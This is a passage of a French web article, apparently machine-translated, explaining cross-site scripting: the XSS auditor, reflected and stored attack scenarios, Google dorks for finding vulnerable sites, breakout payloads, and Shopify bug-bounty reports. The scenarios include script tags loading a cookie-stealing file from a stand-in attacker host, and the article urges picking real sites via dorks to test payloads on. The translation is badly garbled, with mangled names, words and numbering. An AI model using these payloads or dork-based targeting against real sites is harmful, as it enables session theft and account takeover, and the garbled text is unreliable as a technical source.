logiciel malveillant de JavaScript et faire un lien pour envoyer la victime, comme cela est fait pour les scripts standard non permanents.</p> <h2>Auditeur XSS <br></h2> <p>DANS <a href="https://ilyarm.ru/fr/gde-nahodyatsya-sohranennye-paroli-v-gugl-hrom-mesto-hraneniya.html">Google Chrome.</a> (ainsi que dans l'opéra, qui utilise maintenant le moteur Google Chrome), j'attendais une telle surprise:</p> <blockquote> <p>dOM_XSS.HTML: 30 L'Auditeur XSS a refusé d'exécuter un script dans "http: //localhost/tests/xss/dom_xss.htm#input\u003dToken \u003cscript\u003e alerte (1)</script>"Parce que son code source a été trouvé dans la demande. L'auditeur a été activé en tant que serveur envoyé ni une en-tête" X-XSS-Protection "Ni" Content-Security-Policy ".</p> </blockquote> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/x09-2.jpg.pagespeed.ic.gM4b2zjNrR.jpg' width="100%" loading=lazy loading=lazy></p> <p>Ceux. Maintenant, dans le navigateur, il y a un auditeur XSS qui essaiera de prévenir les XSS. Il n'y a pas de cette fonctionnalité de ce type dans Firefox, mais je pense que c'est une question de temps. Si la mise en œuvre des navigateurs réussira, nous pouvons alors parler d'une difficulté significative d'utiliser des XSS.</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x10-3.jpg.pagespeed.ic.YAGfPEUxeH.jpg' width="100%" loading=lazy loading=lazy></p> <p>Il est utile de rappeler que les navigateurs modernes prennent des mesures pour limiter le niveau de fonctionnement des problèmes tels que des XSS non permanents et basé sur DOM XSS. Y compris qu'il est nécessaire de rappeler lorsque vous testez des sites Web à l'aide d'un navigateur - il se peut que l'application Web soit vulnérable, mais vous ne voyez pas de confirmation contextuelle pour la raison pour laquelle le navigateur le bloque.</p> <h2>Exemples d'exploitation de XSS. <br></h2> <p>Les malfaiteurs, l'intention d'utiliser des vulnérabilités de script intersiteite, devraient approcher chaque classe de vulnérabilités de différentes manières. Voici les vecteurs d'attaques pour chaque classe.</p> <p>Avec les vulnérabilités XSS, le boeuf peut être utilisé dans des attaques, ce qui élargit l'attaque du site Web à l'environnement local des utilisateurs.</p> <p><b>Exemple d'attaque avec des XSS non permanents</b></p> <p>1. Alice visit souvent un site Web spécifique qui héberge Bob. Le site Web BOB permet à Alice de se connecter avec le nom de l'utilisateur / du mot de passe et de conserver des données sensibles, telles que les informations de paiement. Lorsque l'utilisateur exerce une entrée, le navigateur conserve les cookies d'autorisation qui ressemblent à des caractères sans signification, c'est-à-dire. Les deux ordinateurs (client et serveur) se souviennent qu'il est entré.</p> <p>2. Malories note que le site Web de BOB contient une vulnérabilité de XSS non permanente:</p> <p>2.1 Lors de la visite de la page de recherche, nous entrons une ligne à rechercher et cliquez sur le bouton Envoyer si les résultats ne sont pas trouvés, la page affiche la chaîne de recherche entrée, suivie des mots "non trouvés" et de l'URL. <b>http://bobssite.org?q\u003de par requête de recherche</b></p> <p>2.2 avec une requête de recherche normale comme le mot " <b>chienchien</b>»Page Affiche simplement" <b>chienchien</b> Non trouvé "et URL http://bobssite.org?q\u003d <b>chienchien</b>Quel est le comportement tout à fait normal.</p> <p>2.3 Néanmoins, quand une requête de recherche anormale est envoyée à la recherche <b><script type="text/javascript">alert("xss");</script> </b>:</p> <p>2.3.1 Un message d'avertissement apparaît (qui dit "XSS").</p> <p>2.3.2 Affichages de page <b><script type="text/javascript">alert("xss");</script> pas trouvé</b> Avec un message d'erreur avec le texte "XSS".</p> <p>2.3.3 URL adaptée à l'opération <b>http://bobssite.org?q\u003d.<script%20type="text/javascript">alert("xss");</script> </b></p> <p>3. Malories conçoit l'URL pour exploiter la vulnérabilité:</p> <p>3.1 elle fait l'URL <b>http://bobssite.org?q\u003dpuppies.<script%20src="http://mallorysevilsite.com/authstealer.js"></script> </b>. Il peut choisir de convertir des caractères ASCII dans un format hexadécimal, tel que <b>http://bobssite.org?q\u003dpuppies%3CScript%2520Src%3D%22HTTP%3A%2F%2FMALLORYSEVILSITE.JEZ%2FAUTUHSTEALER.JS%22%3E.</b> Pour que les gens puissent découvrir immédiatement une URL malveillante.</p> <p>3.2 Elle envoie un e-mail à un membre sans méfiance du site Bob, en disant: "Vérifiez les chiens cool."</p> <p>4. Alice reçoit une lettre. Elle aime les chiens et clique sur le lien. Elle va sur le site Bob dans la recherche, elle ne trouve rien, il affiche les "chiens non trouvés", et au milieu de la balise, la balise est démarrée avec un script (il est invisible à l'écran), Charges et exécute le programme Malory authstealer.js (attaque XSS). Alice oublie à ce sujet.</p> <p>5. Le programme AuthStealer.js commence dans le navigateur Alice comme si sa source est le site Web de BOB. Elle capture une copie des cookies d'autorisation d'Alice et envoie au serveur de Malory, où les malories les suppriment.</p> <p>7. Maintenant que les Malories à l'intérieur, il va sur le site Web du site Web, looke et voler une copie du numéro de carte de crédit Alice. Puis elle va et change le mot de passe, c'est-à-dire Maintenant, Alice ne peut même pas aller.</p> <p>8. Elle décide de faire <a href="https://ilyarm.ru/fr/konvertirovat-fail-fb2-preobrazovanie-faila-fb2-v-dokument-microsoft-word-sleduite.html">l'étape suivante</a> Et il envoie le Bob lui-même conçu de la même manière à la liaison et obtient ainsi des privilèges administratifs du site BOB.</p> <p><b>Attaque avec des XSS constants</b></p> <ol><li>Malories a un compte sur le site Bob.</li> <li>Malory note que le site Web de BOB contient une vulnérabilité XSS constante. Si vous allez dans une nouvelle section, placez un commentaire, puis il affiche qu'il ne serait pas imprimé. Mais si le texte de commentaire contient des balises HTML, ces balises seront affichées comme elles sont, et toutes les balises de script sont lancées.</li> <li>Malay lit un article dans la section des nouvelles et écrit un commentaire dans la section des commentaires. Dans le commentaire, il insère le texte:</li> <li>Dans cette histoire, j'ai tellement aimé les chiens. Ils sont si gentils! <script src="http://mallorysevilsite.com/authstealer.js"></li> <li>Quand Alice (ou quelqu'un d'autre) Téléchargez la page avec ce commentaire, la balise de script maladique est lancée et voler les cuisinières d'autorisation d'Alice, envoie Malay au serveur secret à collecter.</li> <li>Les malories peuvent maintenant intercepter la session Alice et se donner à Alice.</li> </ol><h2>Sites de recherche vulnérables à XSS <br></h2> <p><b>Dorki pour XSS.</b></p> <p>La première étape est le choix des sites sur lesquels nous effectuerons des attaques XSS. Les sites peuvent être signés à l'aide de Google Dorkov. Voici certaines de ces distances qui copient et collectent dans la recherche Google:</p> <ul><li>inurl: search.php? q \u003d</li> <li>inurl: .php? q \u003d</li> <li>inurl: search.php.</li> <li>inurl: .php? Search \u003d</li> </ul><p>Avant que nous ouvrions une liste de sites. Vous devez ouvrir le site et trouver des champs de saisie, tels que le formulaire de retour, le formulaire d'entrée, la recherche de site, etc.</p> <p>Je note immédiatement qu'il est presque inutile de rechercher des vulnérabilités dans les applications Web actualisées automatiquement. L'exemple classique d'une telle application est WordPress. En fait, des vulnérabilités dans WordPress, et surtout dans ses plugins, il y en a. De plus, de nombreux sites ne mettent pas la mise à jour du moteur WordPress (en raison du fait que le webmaster a apporté des modifications au code source), ni des plug-ins et des sujets (en règle générale, ce sont des plug-ins et des sujets pirarés). Mais si vous lisez cette section et reconnaissez quelque chose de nouveau, alors WordPress n'est pas encore pour vous ... Je reviendrai certainement à lui plus tard.</p> <p>Les meilleurs objectifs sont une variété de moteurs et de scripts auto-écrits.</p> <p>Vous pouvez choisir comme une charge utile pour l'insertion</p><p> <script>alert(1)</script> </p><p>Faites attention auxquelles les codes du code HTML tombent votre code intégré. Voici un exemple d'un champ de saisie de champ typique ( <b>contribution</b>):</p><p> <input type="text" class="ui-input query" name="q" value="taie d'oreiller"/><script>alert(1)</script><input value="" /> </p><p>Notre charge utile ira à l'endroit où le mot «taies d'oreiller» est maintenant. Ceux. se transformer en étiquette <b>contribution</b>. Nous pouvons éviter cela - fermez une citation double, puis la balise elle-même avec <b>"/> </b></p> <p> "/><script>alert(1)</script> </p><p>Essayons-la pour certains sites:</p> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/101.jpg' width="100%" loading=lazy loading=lazy></p> <p>Excellente vulnérabilité</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/102.jpg' width="100%" loading=lazy loading=lazy></p> <h2>Programmes de recherche et de recherche de la vulnérabilité XSS <br></h2> <p>Probablement toutes les scanneurs d'applications Web ont un scanner de vulnérabilité XSS intégré. Ce sujet est awkhangeing, il est préférable de se familiariser avec chacun de ce scanner séparément.</p> <p>Les scripts croisés, ou les scripts de site croisés, ou XSS, suppose la présence d'un site qui connecte un code JavaScript imprévu, qui, à son tour, est transmis aux utilisateurs effectuant ce code dans leurs navigateurs. L'exemple inoffensif de XSS (comme celui-ci, vous devez utiliser!) On dirait que ceci:</p> <p>alerte ('xss');</p> <p>Cela va créer un appel <a href="https://ilyarm.ru/fr/peremennye-oblast-vidimosti-peremennyh-funkcii-v-javascript--.html">fonctionnalité JavaScript</a> Alertez et créez une fenêtre simple (et inoffensive) avec des lettres XSS. DANS <a href="https://ilyarm.ru/fr/how-to-roll-back-android-to-the-previous-version-how-to-roll-back-an-android-update.html">versions précédentes</a> Les livres que je vous ai recommandé d'utiliser cet exemple lorsque vous écrivez des rapports. C'était tellement alors qu'un pirate de hackeur extrêmement réussi m'a dit que c'était un "exemple terrible", expliquant que le destinataire du rapport de vulnérabilité peut ne pas comprendre le danger du problème et en raison de l'innocuité de l'exemple, de payer une petite rémunération.</p> <p>Ainsi, utilisez cet exemple pour détecter la vulnérabilité XSS, mais lors de l'élaboration d'un rapport, envisagez des dommages potentiels pouvant causer la vulnérabilité et l'expliquer. En vertu de cela, je ne veux pas dire l'histoire de la société sur ce que XSS est, mais je propose d'expliquer ce que vous pouvez atteindre, en utilisant une vulnérabilité et de la manière dont elle pourrait spécifiquement affecter leur site Web.</p> <p>Il existe trois types de XSS différents, que vous pourriez entendre lors de la recherche et de la rédaction de rapports:</p> <ul><li>XSS réfléchissant: Ces attaques ne sont pas enregistrées sur le site, ce qui signifie créer et exécuter XSS dans une demande et réponse.</li> <li>Stocké XSS: Ces attaques sont enregistrées sur le site et sont souvent plus dangereuses. Ils sont enregistrés sur le serveur et sont effectués sur des pages «normales» par des utilisateurs sans méfiance.</li> <li>Auto XSS: Ces attaques ne sont également pas sauvegardées sur le site et sont généralement utilisées dans le cadre de la tromperie d'une personne afin de gérer XSS eux-mêmes. Lorsque vous recherchez des vulnérabilités, vous constaterez que les entreprises ne se soucient souvent pas de l'élimination des XSS, Ils sont inquiets à propos de ces cas lorsque des dommages à leurs utilisateurs peuvent être appliqués non par eux-mêmes, mais quiconque, comme dans le cas de la réflexion et du XSS stocké. Cependant, cela ne signifie pas que vous ne devriez pas rechercher des XSS.</li> </ul><p>Si vous avez trouvé une situation dans laquelle les auto-XSS peuvent être exécutées, mais non sauvegardées, pensez à la manière dont cette vulnérabilité peut être utilisée, pouvez-vous l'utiliser en combinaison avec quelque chose de sorte qu'il ne soit plus des XSS?</p> <p>L'un des exemples les plus célèbres d'utiliser XSS - Myspace Samy Work, interprété par le camcar. En octobre 2005, la vulnérabilité XSS stockée elle-même sur MySpace, ce qui lui a permis de télécharger le code JavaScript, qui a été effectué à chaque fois que quelqu'un a visité sa page MySpace en ajoutant un visiteur au profil entre eux-mêmes. De plus, le code s'est également copié sur les pages de nouveaux amis eux-mêmes pour que les profils des nouveaux amis soient mis à jour avec le texte suivant: "Mais surtout, Samy est mon héros".</p> <p>Bien que l'exemple lui-même était relativement inoffensif, l'utilisation de XSS vous permet de voler de la connexion, des mots de passe, des informations bancaires, etc. Malgré le préjudice potentiel, la correction des vulnérabilités XSS n'est généralement pas difficile et oblige les développeurs à protéger simplement l'entrée de l'utilisateur (directement comme dans les injections HTML) lorsqu'il est affiché. Bien que certains sites éliminent également des caractères potentiellement malveillants lorsque le piratage les envoie.</p> <h3>1. Vente Shopify</h3> <p><b>Complexité:</b> Faible <br><b>URL:</b> Wholesale.shopify.com. <br><b>Lien vers le rapport:</b> https://hackerone.com/reports/10629326 Date du rapport: 21 décembre 2015 <br><b>Paie:</b> $500<br><b>La description:</b></p> <p>Site Vente Shopifify27 est une page simple avec un appel direct à l'action - Entrez le nom des marchandises et cliquez sur "Rechercher des produits". Voici une capture d'écran:</p> <p><img src='https://i2.wp.com/cryptoworld.su/wp-content/uploads/2016/11/5ddb8743022bec718aae541fc75d3ebd.png' width="100%" loading=lazy loading=lazy></p><p>Site Capture d'écran Soldesale</p> <p>La vulnérabilité XSS était la plus simple que celle que l'on ne peut être trouvée que: le texte saisi dans la chaîne de recherche n'était pas blindé, de sorte que tout javascript entré. Voici le texte envoyé de la description de la vulnérabilité: test '; alerte (' XSS ');'</p> <p>La raison pour laquelle il a fonctionné est que Shopify a pris la saisie de l'utilisateur, effectué une requête de recherche et en l'absence de résultats, imprimer un message signalé sur l'absence de résultats de recherche pour la requête entrée, montrant la page non blindée de l'utilisateur non blindé. En conséquence, le JavaScript expédié rendu sur la page et les navigateurs l'ont interprété comme exécutable JavaScript.</p> <h3>conclusions</h3> <p>Testez tout, faites une attention particulière aux situations où le texte est entré dans la page. Vérifiez si vous pouvez activer Entrée HTML ou JavaScript, et voir comment le site les traite. De même, essayez de coder l'entrée comme décrit dans le chapitre dédié aux injections HTML.</p> <p>Les vulnérabilités du XSS ne doivent pas être complexes ou déroutantes. Cette vulnérabilité était la plus simple, laquelle peut imaginer est un champ simple pour la saisie de texte qui ne traite pas l'entrée de l'utilisateur. Et elle a été découverte le 21 décembre 2015 et a apporté 500 $ Hacker! Tout ce qui avait besoin - pirate de pirate.</p> <h3>2. Panier de carte-cadeau ShopIfifiez</h3> <p><b>Complexité:</b> Faible <br><b>URL:</b> Hardware.Shopify.com/cart <br><b>Lien vers le rapport:</b> https://hackerone.com/reports/9508928 Date du rapport: 21 octobre 2015 <br><b>Paie:</b> $500<br><b>La description:</b></p> <p>Magasin de site <a href="https://ilyarm.ru/fr/sozdanie-akkaunta-v-app-store-kak-sozdat-apple-id-bez-kreditnoi-karty.html">cartes cadeaux</a> Shopify29 permet aux utilisateurs de créer leur propre conception pour des cartes-cadeaux à l'aide d'un formulaire HTML, qui inclut la fenêtre de chargement de fichier, plusieurs lignes pour entrer le texte des détails, etc. Voici une capture d'écran:</p> <p><img src='https://i1.wp.com/cryptoworld.su/wp-content/uploads/2016/11/9918de0af2718d46ad92c4b916ae68ac.png' width="100%" loading=lazy loading=lazy></p><p>Shopify Cadeau Card Store Capture d'écran</p> <p>La vulnérabilité XSS a été déclenchée dans le champ de formulaire, qui était destinée au nom d'image, JavaScript a été entrée. Il est assez facile de faire, en utilisant le proxy HTML, sur lequel nous allons parler au chapitre «Outils» de la litige. Donc, le segment d'origine du formulaire incluait:</p> <table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td> <td class="crayon-code"><p>Contenu - Disposition: forme - données; Nom \u003d "Propriétés [Fichier Artwor 2 K]"</p> </td> </tr></table><br> Il pourrait être intercepté et changé sur: <br><table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td> <td class="crayon-code"><p>Contenu - Disposition: forme - données; Nom \u003d "Propriétés [Fichier Artwor 2 K< img src = ’test ’onmouseover = ’alert (2 ) ’> ] ”; </p> </td> </tr></table> <h3>conclusions</h3> <p>Ici, vous pouvez remarquer deux choses qui aideront à détecter les vulnérabilités XSS.</p> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </article></section><div id="yandex_rtb_R-A-242532-1"></div> <div class="decom_dop_bloc"><a name="comments"></a></div></main> <aside class="sidebar"> <div class="top"> <p> <script id="custom-block-92677863" type="text/javascript"> custom_block(17, 92677863, 5896); </script> </p> <div class="top__headline"><span>Top 5 meilleurs articles</span></div> <div class="tabs"> <div class="top-item"> <div class="top-item__image"><img src="/uploads/36778cbd248483871f3a1b7648454033.jpg" width="88" height="58" alt="Je ne peux pas entrer de camarades de classe, que faire?" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/fr/ne-mogu-zaiti-na-odnoklassniki-chto-delat-ne-mogu-voiti-v-odnoklassniki-chto.html">Je ne peux pas entrer de camarades de classe, que faire?</a></div> <p>Ne démarrez pas le site des camarades de classe, incorrect ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/945d2b485d531f308c4586dbf7e20817.jpg" width="88" height="58" alt="Comment restaurer une page bloquée en contact" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/fr/vosstanovit-stranichku-vkontakte-kak-vosstanovit.html">Comment restaurer une page bloquée en contact</a></div> <p>Restaurer la page distante Vkontakte ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/a9e3376537e67f565752f1880cc43cab.jpg" width="88" height="58" alt="La souris ne fonctionne pas sur l'ordinateur portable, que faire?" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/fr/kak-zapustit-myshku-na-noutbuke-ne-rabotaet-myshka-na-noutbuke.html">La souris ne fonctionne pas sur l'ordinateur portable, que faire?</a></div> <p>Contrôle du curseur avec la souris de manière significative ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/d703a3e7eb0f053da5b7cce8cdd0e8af.jpg" width="88" height="58" alt="Que faire si les boutons TouchPad ne fonctionnent pas sur un ordinateur portable" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/fr/kak-vklyuchit-myshku-na-noutbuke-packard-bell-chto-delat-esli-ne-rabotayut-knopki.html">Que faire si les boutons TouchPad ne fonctionnent pas sur un ordinateur portable</a></div> <p>Le TouchPad ne fonctionne pas sur l'ordinateur portable Asus que vous voulez ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/f13067b4d9246d9d68cfe0234d4e2674.jpg" width="88" height="58" alt="Pourquoi je ne peux pas aller à ma page dans ses camarades de classe" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/fr/ne-mogu-zaiti-v-odnoklassniki-pishet-nevernyi-pochemu-ne-mogu-zaiti-na.html">Pourquoi je ne peux pas aller à ma page dans ses camarades de classe</a></div> <p>Bonjour chers amis! Encore venir ... ...</p> </div> </div> <div id="mywidget-recommendations-3"> </div> </div> <div class="top"> <p> <script id="custom-block-92677863" type="text/javascript"> custom_block(17, 92677863, 5896); </script> </p> <div class="top__headline"><span>Nouveaux articles</span></div> <div class="tabs"> <div class="top-item"> <div class="top-item__image"><img src="/uploads/26c1627c043a8427dcc006f51d63b7f6.jpg" width="88" height="58" alt="Comment activer le wifi sur un ordinateur portable" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/fr/knopka-wifi-na-noutbuke-samsung-kak-vklyuchit-wifi-na-noutbuke-kak-vklyuchit-i-wifi-na.html">Comment activer le wifi sur un ordinateur portable</a></div> <p>Aujourd'hui, il est prudent de dire que Wi-Fi ... ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/ae9b9f47ba9ba4e0c890485de979ae9f.jpg" width="88" height="58" alt="TV ne trouve pas de canaux et n'est pas configuré" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/fr/televizor-ne-pokazyvaet-nekotorye-kanaly-televizor-ne-nahodit-kanaly-i-ne.html">TV ne trouve pas de canaux et n'est pas configuré</a></div> <p>Jusqu'à présent, il y a ceux qui ont l'air ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/db099fb7fea177ce8ae1ba99e550d8eb.jpg" width="88" height="58" alt="Configuration du répéteur WiFi (répéteur) pour le réseau sans fil" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/fr/tehnologiya-wds-nastroika-wifi-povtoritelya-repitera-dlya.html">Configuration du répéteur WiFi (répéteur) pour le réseau sans fil</a></div> <p>Parfois, il est nécessaire de mettre en place deux ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/335353c0ec91bbcc06f7417b5fd2d6e6.jpg" width="88" height="58" alt="Nom générateur et nom de famille. Jeux de nicky. Erreurs typiques lors du choix d'un pseudonyme" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/fr/generator-imya-i-familiya-niki-dlya-igr-tipichnye-oshibki-pri-vybore.html">Nom générateur et nom de famille. Jeux de nicky. Erreurs typiques lors du choix d'un pseudonyme</a></div> <p>Nick, ou surnom, est un nom de réseau qui ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/78b29b5b427903ad482df6d251c9f635.jpg" width="88" height="58" alt="Shadowban dans Instagram - Comment quitter Shadow (Instructions de survie) Banque cachée" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/fr/chto-znachit-tenevoi-ban-v-instagrame-shadowban-v-instagram-kak-vyiti-iz-teni.html">Shadowban dans Instagram - Comment quitter Shadow (Instructions de survie) Banque cachée</a></div> <p>Vous avez décidé de ne pas dépenser de l'argent sur une promotion adéquate, ... ...</p> </div> </div> <div id="mywidget-recommendations-3"> </div> </div> </aside> </div> <footer class="footer"><div class="footer__copyright"> <a href='https://play.google.com/store/apps/details?id=org.planetsapp.pdfreader' target='_blank' onclick="navigator.sendBeacon('https://live.electrikhelp.com/iibim?q=gplay&sub1=ilyarm.ru&sub2=org.planetsapp.pdfreader&u='+encodeURIComponent(window.location.href)+'&refjs='+encodeURIComponent(document.referrer)+'');"><img src='/googleplay.svg' style='opacity:0.4; height: 20px; margin:10px; '></a> <p>© 2021 Ilyarm.ru.</p> <div class="footer__sogl"> </div> </div><div class="footer__counters" id="text-2"><div class="textwidget"> </div></div><span style="display: none;"></span></footer> </div></div><script type='text/javascript' src='https://ilyarm.ru/wp-content/plugins/decomments/templates/decomments/assets/js/decom.min.js?ver=1499187887'></script><script type='text/javascript' src='https://ilyarm.ru/wp-content/plugins/wp-postratings/js/postratings-js.js?ver=1.85'></script><script type='text/javascript'>var q2w3_sidebar_options = new Array(); q2w3_sidebar_options[0] = { "sidebar" : "sidebar-2", "margin_top" : 20, "margin_bottom" : 260, "stop_id" : "", "screen_max_width" : 0, "screen_max_height" : 0, "width_inherit" : false, "refresh_interval" : 1500, "window_load_hook" : false, "disable_mo_api" : false, "widgets" : ['mywidget-recommendations-3'] } ; </script><script type='text/javascript' src='https://ilyarm.ru/wp-content/plugins/q2w3-fixed-widget/js/q2w3-fixed-widget.min.js?ver=5.0.4'></script><script type='text/javascript' src='https://ilyarm.ru/wp-content/themes/mobi/js/scripts.js'></script><script type='text/javascript' src='/wp-includes/js/comment-reply.min.js?ver=4.9.1'></script><script type='text/javascript'>/* <![CDATA[ */ var thickboxL10n = { "next":"\u0414\u0430\u043b\u0435\u0435 \u2192","prev":"\u2190 \u041d\u0430\u0437\u0430\u0434","image":"\u0418\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u0435","of":"\u0438\u0437","close":"\u0417\u0430\u043a\u0440\u044b\u0442\u044c","noiframes":"\u042d\u0442\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 \u043f\u043b\u0430\u0432\u0430\u044e\u0449\u0438\u0445 \u0444\u0440\u0435\u0439\u043c\u043e\u0432. \u0423 \u0432\u0430\u0441 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u044b \u0442\u0435\u0433\u0438 iframe, \u043b\u0438\u0431\u043e \u0432\u0430\u0448 \u0431\u0440\u0430\u0443\u0437\u0435\u0440 \u0438\u0445 \u043d\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442.","loadingAnimation":"https:\/\/ilyarm.ru\/wp-includes\/js\/thickbox\/loadingAnimation.gif"} ; /* ]]> */ </script><script type='text/javascript' src='/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105'></script><script data-cfasync='false'>/*! loadCSS. [c]2017 Filament Group, Inc. MIT License */ !function(a){ "use strict";var b=function(b,c,d){ function e(a){ return h.body?a():void setTimeout(function(){ e(a)} )} function f(){ i.addEventListener&&i.removeEventListener("load",f),i.media=d||"all"} var g,h=a.document,i=h.createElement("link");if(c)g=c;else{ var j=(h.body||h.getElementsByTagName("head")[0]).childNodes;g=j[j.length-1]} var k=h.styleSheets;i.rel="stylesheet",i.href=b,i.media="only x",e(function(){ g.parentNode.insertBefore(i,c?g:g.nextSibling)} );var l=function(a){ for(var b=i.href,c=k.length;c--;)if(k[c].href===b)return a();setTimeout(function(){ l(a)} )} ;return i.addEventListener&&i.addEventListener("load",f),i.onloadcssdefined=l,l(f),i} ;"undefined"!=typeof exports?exports.loadCSS=b:a.loadCSS=b} ("undefined"!=typeof global?global:this); /*! loadCSS rel=preload polyfill. [c]2017 Filament Group, Inc. MIT License */ !function(a){ if(a.loadCSS){ var b=loadCSS.relpreload={ };if(b.support=function(){ try{ return a.document.createElement("link").relList.supports("preload")} catch(b){ return!1} },b.poly=function(){ for(var b=a.document.getElementsByTagName("link"),c=0;c<b.length;c++){ var d=b[c];"preload"===d.rel&&"style"===d.getAttribute("as")&&(a.loadCSS(d.href,d,d.getAttribute("media")),d.rel=null)} },!b.support()){ b.poly();var c=a.setInterval(b.poly,300);a.addEventListener&&a.addEventListener("load",function(){ b.poly(),a.clearInterval(c)} ),a.attachEvent&&a.attachEvent("onload",function(){ a.clearInterval(c)} )} }} (this);</script></body></html>